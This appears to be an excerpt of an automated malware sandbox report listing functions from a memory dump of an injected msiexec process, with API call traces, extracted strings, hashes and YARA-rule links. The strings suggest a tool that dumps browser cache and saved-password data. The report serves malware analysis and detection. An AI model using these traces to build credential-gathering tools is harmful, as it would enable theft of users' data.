                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                          Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                          • API String ID: 1607361635-601624466
                                                                                                                                                                                                          • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                          • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                          Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                          • API String ID: 2000436516-3842416460
                                                                                                                                                                                                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                          Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1043902810-0
                                                                                                                                                                                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                          Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                          • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75082EE0), ref: 0040E3EC
                                                                                                                                                                                                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75082EE0), ref: 0040E407
                                                                                                                                                                                                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75082EE0), ref: 0040E422
                                                                                                                                                                                                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75082EE0), ref: 0040E43D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                          • API String ID: 3849927982-2252543386
                                                                                                                                                                                                          • Opcode ID: 4fb386ce9209b8875289dcc542ef71d6c34f1816ca3767685257c05f3f5c3b96
                                                                                                                                                                                                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fb386ce9209b8875289dcc542ef71d6c34f1816ca3767685257c05f3f5c3b96
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                                          Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                          • API String ID: 2899246560-1542517562
                                                                                                                                                                                                          • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                                                                                                                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                          Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                          • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                          • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                          • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                          • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                          • String ID: ---
                                                                                                                                                                                                          • API String ID: 3437578500-2854292027
                                                                                                                                                                                                          • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                                                                                                                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                          Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                          • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1010922700-0
                                                                                                                                                                                                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                          Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                          • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                          • free.MSVCRT ref: 004186C7
                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                          • free.MSVCRT ref: 004186E0
                                                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                          • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                          • free.MSVCRT ref: 00418716
                                                                                                                                                                                                          • free.MSVCRT ref: 0041872A
                                                                                                                                                                                                          • free.MSVCRT ref: 00418749
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                                          • String ID: |A
                                                                                                                                                                                                          • API String ID: 3356672799-1717621600
                                                                                                                                                                                                          • Opcode ID: 96c66879b4041adad5e36cadfde5f9aa16ffca4bba1cd09b44366f464025a3b3
                                                                                                                                                                                                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96c66879b4041adad5e36cadfde5f9aa16ffca4bba1cd09b44366f464025a3b3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                          Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                          • API String ID: 2081463915-1959339147
                                                                                                                                                                                                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                                          Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                          • API String ID: 2012295524-70141382
                                                                                                                                                                                                          • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                          Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                                                                                                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                          Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1700100422-0
                                                                                                                                                                                                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                          Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
